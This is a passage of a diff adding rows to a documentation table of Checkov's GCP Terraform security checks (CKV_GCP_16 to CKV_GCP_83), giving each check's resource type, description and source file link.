+| 1627 | CKV_GCP_16      | resource | google_dns_managed_zone                                 | Ensure that DNSSEC is enabled for Cloud DNS                                                                                                                                                              | Terraform | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py)                                                                               |
+| 1628 | CKV_GCP_17      | resource | google_dns_managed_zone                                 | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC                                                                                                            | Terraform | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py)                                                                     |
+| 1629 | CKV_GCP_18      | resource | google_container_cluster                                | Ensure GKE Control Plane is not public                                                                                                                                                                   | Terraform | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py)                                                                                     |
+| 1630 | CKV_GCP_20      | resource | google_container_cluster                                | Ensure master authorized networks is set to enabled in GKE clusters                                                                                                                                      | Terraform | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py)                                                           |
+| 1631 | CKV_GCP_21      | resource | google_container_cluster                                | Ensure Kubernetes Clusters are configured with Labels                                                                                                                                                    | Terraform | [GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py)                                                                                                       |
+| 1632 | CKV_GCP_22      | resource | google_container_node_pool                              | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image                                                                                                                    | Terraform | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py)                                                                                                   |
+| 1633 | CKV_GCP_23      | resource | google_container_cluster                                | Ensure Kubernetes Cluster is created with Alias IP ranges enabled                                                                                                                                        | Terraform | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py)                                                                                             |
+| 1634 | CKV_GCP_24      | resource | google_container_cluster                                | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters                                                                                                                         | Terraform | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py)                                                                         |
+| 1635 | CKV_GCP_25      | resource | google_container_cluster                                | Ensure Kubernetes Cluster is created with Private cluster enabled                                                                                                                                        | Terraform | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py)                                                                                 |
+| 1636 | CKV_GCP_26      | resource | google_compute_subnetwork                               | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network                                                                                                                                   | Terraform | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py)                                                                   |
+| 1637 | CKV_GCP_27      | resource | google_project                                          | Ensure that the default network does not exist in a project                                                                                                                                              | Terraform | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py)                                                                         |
+| 1638 | CKV_GCP_28      | resource | google_storage_bucket_iam_binding                       | Ensure that Cloud Storage bucket is not anonymously or publicly accessible                                                                                                                               | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py)                                                                       |
+| 1639 | CKV_GCP_28      | resource | google_storage_bucket_iam_member                        | Ensure that Cloud Storage bucket is not anonymously or publicly accessible                                                                                                                               | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py)                                                                       |
+| 1640 | CKV_GCP_29      | resource | google_storage_bucket                                   | Ensure that Cloud Storage buckets have uniform bucket-level access enabled                                                                                                                               | Terraform | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py)                                                               |
+| 1641 | CKV_GCP_30      | resource | google_compute_instance                                 | Ensure that instances are not configured to use the default service account                                                                                                                              | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py)                                                           |
+| 1642 | CKV_GCP_30      | resource | google_compute_instance_from_template                   | Ensure that instances are not configured to use the default service account                                                                                                                              | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py)                                                           |
+| 1643 | CKV_GCP_30      | resource | google_compute_instance_template                        | Ensure that instances are not configured to use the default service account                                                                                                                              | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py)                                                           |
+| 1644 | CKV_GCP_31      | resource | google_compute_instance                                 | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs                                                                                           | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py)                                       |
+| 1645 | CKV_GCP_31      | resource | google_compute_instance_from_template                   | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs                                                                                           | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py)                                       |
+| 1646 | CKV_GCP_31      | resource | google_compute_instance_template                        | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs                                                                                           | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py)                                       |
+| 1647 | CKV_GCP_32      | resource | google_compute_instance                                 | Ensure 'Block Project-wide SSH keys' is enabled for VM instances                                                                                                                                         | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py)                                                                       |
+| 1648 | CKV_GCP_32      | resource | google_compute_instance_from_template                   | Ensure 'Block Project-wide SSH keys' is enabled for VM instances                                                                                                                                         | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py)                                                                       |
+| 1649 | CKV_GCP_32      | resource | google_compute_instance_template                        | Ensure 'Block Project-wide SSH keys' is enabled for VM instances                                                                                                                                         | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py)                                                                       |
+| 1650 | CKV_GCP_33      | resource | google_compute_project_metadata                         | Ensure oslogin is enabled for a Project                                                                                                                                                                  | Terraform | [GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py)                                                                         |
+| 1651 | CKV_GCP_34      | resource | google_compute_instance                                 | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances)                                             | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py)                                                                       |
+| 1652 | CKV_GCP_34      | resource | google_compute_instance_from_template                   | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances)                                             | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py)                                                                       |
+| 1653 | CKV_GCP_34      | resource | google_compute_instance_template                        | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances)                                             | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py)                                                                       |
+| 1654 | CKV_GCP_35      | resource | google_compute_instance                                 | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance                                                                                                                                | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py)                                                                               |
+| 1655 | CKV_GCP_35      | resource | google_compute_instance_from_template                   | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance                                                                                                                                | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py)                                                                               |
+| 1656 | CKV_GCP_35      | resource | google_compute_instance_template                        | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance                                                                                                                                | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py)                                                                               |
+| 1657 | CKV_GCP_36      | resource | google_compute_instance                                 | Ensure that IP forwarding is not enabled on Instances                                                                                                                                                    | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py)                                                                                   |
+| 1658 | CKV_GCP_36      | resource | google_compute_instance_from_template                   | Ensure that IP forwarding is not enabled on Instances                                                                                                                                                    | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py)                                                                                   |
+| 1659 | CKV_GCP_36      | resource | google_compute_instance_template                        | Ensure that IP forwarding is not enabled on Instances                                                                                                                                                    | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py)                                                                                   |
+| 1660 | CKV_GCP_37      | resource | google_compute_disk                                     | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                             | Terraform | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py)                                                                         |
+| 1661 | CKV_GCP_38      | resource | google_compute_instance                                 | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                             | Terraform | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py)                                                                 |
+| 1662 | CKV_GCP_39      | resource | google_compute_instance                                 | Ensure Compute instances are launched with Shielded VM enabled                                                                                                                                           | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py)                                                                                 |
+| 1663 | CKV_GCP_39      | resource | google_compute_instance_from_template                   | Ensure Compute instances are launched with Shielded VM enabled                                                                                                                                           | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py)                                                                                 |
+| 1664 | CKV_GCP_39      | resource | google_compute_instance_template                        | Ensure Compute instances are launched with Shielded VM enabled                                                                                                                                           | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py)                                                                                 |
+| 1665 | CKV_GCP_40      | resource | google_compute_instance                                 | Ensure that Compute instances do not have public IP addresses                                                                                                                                            | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py)                                                                                 |
+| 1666 | CKV_GCP_40      | resource | google_compute_instance_from_template                   | Ensure that Compute instances do not have public IP addresses                                                                                                                                            | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py)                                                                                 |
+| 1667 | CKV_GCP_40      | resource | google_compute_instance_template                        | Ensure that Compute instances do not have public IP addresses                                                                                                                                            | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py)                                                                                 |
+| 1668 | CKV_GCP_41      | resource | google_project_iam_binding                              | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level                                                                                  | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py)                                                                       |
+| 1669 | CKV_GCP_41      | resource | google_project_iam_member                               | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level                                                                                  | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py)                                                                       |
+| 1670 | CKV_GCP_42      | resource | google_project_iam_member                               | Ensure that Service Account has no Admin privileges                                                                                                                                                      | Terraform | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py)                                                               |
+| 1671 | CKV_GCP_43      | resource | google_kms_crypto_key                                   | Ensure KMS encryption keys are rotated within a period of 90 days                                                                                                                                        | Terraform | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py)                                                                                 |
+| 1672 | CKV_GCP_44      | resource | google_folder_iam_binding                               | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level                                                                                                    | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py)                                                                     |
+| 1673 | CKV_GCP_44      | resource | google_folder_iam_member                                | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level                                                                                                    | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py)                                                                     |
+| 1674 | CKV_GCP_45      | resource | google_organization_iam_binding                         | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level                                                                                             | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py)                                                                           |
+| 1675 | CKV_GCP_45      | resource | google_organization_iam_member                          | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level                                                                                             | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py)                                                                           |
+| 1676 | CKV_GCP_46      | resource | google_project_iam_binding                              | Ensure Default Service account is not used at a project level                                                                                                                                            | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py)                                               |
+| 1677 | CKV_GCP_46      | resource | google_project_iam_member                               | Ensure Default Service account is not used at a project level                                                                                                                                            | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py)                                               |
+| 1678 | CKV_GCP_47      | resource | google_organization_iam_binding                         | Ensure default service account is not used at an organization level                                                                                                                                      | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py)                                                       |
+| 1679 | CKV_GCP_47      | resource | google_organization_iam_member                          | Ensure default service account is not used at an organization level                                                                                                                                      | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py)                                                       |
+| 1680 | CKV_GCP_48      | resource | google_folder_iam_binding                               | Ensure Default Service account is not used at a folder level                                                                                                                                             | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py)                                                 |
+| 1681 | CKV_GCP_48      | resource | google_folder_iam_member                                | Ensure Default Service account is not used at a folder level                                                                                                                                             | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py)                                                 |
+| 1682 | CKV_GCP_49      | resource | google_project_iam_binding                              | Ensure roles do not impersonate or manage Service Accounts used at project level                                                                                                                         | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py)                                                                   |
+| 1683 | CKV_GCP_49      | resource | google_project_iam_member                               | Ensure roles do not impersonate or manage Service Accounts used at project level                                                                                                                         | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py)                                                                   |
+| 1684 | CKV_GCP_50      | resource | google_sql_database_instance                            | Ensure MySQL database 'local_infile' flag is set to 'off'                                                                                                                                                | Terraform | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py)                                                                   |
+| 1685 | CKV_GCP_51      | resource | google_sql_database_instance                            | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on'                                                                                                                                         | Terraform | [GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py)                                                         |
+| 1686 | CKV_GCP_52      | resource | google_sql_database_instance                            | Ensure PostgreSQL database 'log_connections' flag is set to 'on'                                                                                                                                         | Terraform | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py)                                                           |
+| 1687 | CKV_GCP_53      | resource | google_sql_database_instance                            | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on'                                                                                                                                      | Terraform | [GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py)                                                     |
+| 1688 | CKV_GCP_54      | resource | google_sql_database_instance                            | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on'                                                                                                                                          | Terraform | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py)                                                             |
+| 1689 | CKV_GCP_55      | resource | google_sql_database_instance                            | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value                                                                                                                               | Terraform | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py)                                                           |
+| 1690 | CKV_GCP_56      | resource | google_sql_database_instance                            | Ensure PostgreSQL database 'log_temp_files flag is set to '0'                                                                                                                                            | Terraform | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py)                                                                       |
+| 1691 | CKV_GCP_57      | resource | google_sql_database_instance                            | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1'                                                                                                                              | Terraform | [GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py)                                                         |
+| 1692 | CKV_GCP_58      | resource | google_sql_database_instance                            | Ensure SQL database 'cross db ownership chaining' flag is set to 'off'                                                                                                                                   | Terraform | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py)                                       |
+| 1693 | CKV_GCP_59      | resource | google_sql_database_instance                            | Ensure SQL database 'contained database authentication' flag is set to 'off'                                                                                                                             | Terraform | [GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py)                                     |
+| 1694 | CKV_GCP_60      | resource | google_sql_database_instance                            | Ensure Cloud SQL database does not have public IP                                                                                                                                                        | Terraform | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py)                                                                   |
+| 1695 | CKV_GCP_61      | resource | google_container_cluster                                | Enable VPC Flow Logs and Intranode Visibility                                                                                                                                                            | Terraform | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py)                                                                                       |
+| 1696 | CKV_GCP_62      | resource | google_storage_bucket                                   | Bucket should log access                                                                                                                                                                                 | Terraform | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py)                                                                                         |
+| 1697 | CKV_GCP_63      | resource | google_storage_bucket                                   | Bucket should not log to itself                                                                                                                                                                          | Terraform | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py)                                                                                 |
+| 1698 | CKV_GCP_64      | resource | google_container_cluster                                | Ensure clusters are created with Private Nodes                                                                                                                                                           | Terraform | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py)                                                                                                 |
+| 1699 | CKV_GCP_65      | resource | google_container_cluster                                | Manage Kubernetes RBAC users with Google Groups for GKE                                                                                                                                                  | Terraform | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py)                                                                     |
+| 1700 | CKV_GCP_66      | resource | google_container_cluster                                | Ensure use of Binary Authorization                                                                                                                                                                       | Terraform | [GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py)                                                                                   |
+| 1701 | CKV_GCP_68      | resource | google_container_cluster                                | Ensure Secure Boot for Shielded GKE Nodes is Enabled                                                                                                                                                     | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py)                                                                     |
+| 1702 | CKV_GCP_68      | resource | google_container_node_pool                              | Ensure Secure Boot for Shielded GKE Nodes is Enabled                                                                                                                                                     | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py)                                                                     |
+| 1703 | CKV_GCP_69      | resource | google_container_cluster                                | Ensure the GKE Metadata Server is Enabled                                                                                                                                                                | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py)                                                                           |
+| 1704 | CKV_GCP_69      | resource | google_container_node_pool                              | Ensure the GKE Metadata Server is Enabled                                                                                                                                                                | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py)                                                                           |
+| 1705 | CKV_GCP_70      | resource | google_container_cluster                                | Ensure the GKE Release Channel is set                                                                                                                                                                    | Terraform | [GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py)                                                                                             |
+| 1706 | CKV_GCP_71      | resource | google_container_cluster                                | Ensure Shielded GKE Nodes are Enabled                                                                                                                                                                    | Terraform | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py)                                                                                   |
+| 1707 | CKV_GCP_72      | resource | google_container_cluster                                | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled                                                                                                                                            | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py)                                                                       |
+| 1708 | CKV_GCP_72      | resource | google_container_node_pool                              | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled                                                                                                                                            | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py)                                                                       |
+| 1709 | CKV_GCP_73      | resource | google_compute_security_policy                          | Ensure Cloud Armor prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                                  | Terraform | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py)                                                                       |
+| 1710 | CKV_GCP_74      | resource | google_compute_subnetwork                               | Ensure that private_ip_google_access is enabled for Subnet                                                                                                                                               | Terraform | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py)                                                       |
+| 1711 | CKV_GCP_75      | resource | google_compute_firewall                                 | Ensure Google compute firewall ingress does not allow unrestricted FTP access                                                                                                                            | Terraform | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py)                                           |
+| 1712 | CKV_GCP_76      | resource | google_compute_subnetwork                               | Ensure that Private google access is enabled for IPV6                                                                                                                                                    | Terraform | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py)                                               |
+| 1713 | CKV_GCP_77      | resource | google_compute_firewall                                 | Ensure Google compute firewall ingress does not allow on ftp port                                                                                                                                        | Terraform | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py)                                           |
+| 1714 | CKV_GCP_78      | resource | google_storage_bucket                                   | Ensure Cloud storage has versioning enabled                                                                                                                                                              | Terraform | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py)                                                                     |
+| 1715 | CKV_GCP_79      | resource | google_sql_database_instance                            | Ensure SQL database is using latest Major version                                                                                                                                                        | Terraform | [CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py)                                                                                       |
+| 1716 | CKV_GCP_80      | resource | google_bigquery_table                                   | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                      | Terraform | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py)                                                                     |
+| 1717 | CKV_GCP_81      | resource | google_bigquery_dataset                                 | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                    | Terraform | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py)                                                                 |
+| 1718 | CKV_GCP_82      | resource | google_kms_crypto_key                                   | Ensure KMS keys are protected from deletion                                                                                                                                                              | Terraform | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py)                                                                                 |
+| 1719 | CKV_GCP_83      | resource | google_pubsub_topic                                     | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                         | Terraform | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py)                                                                         |
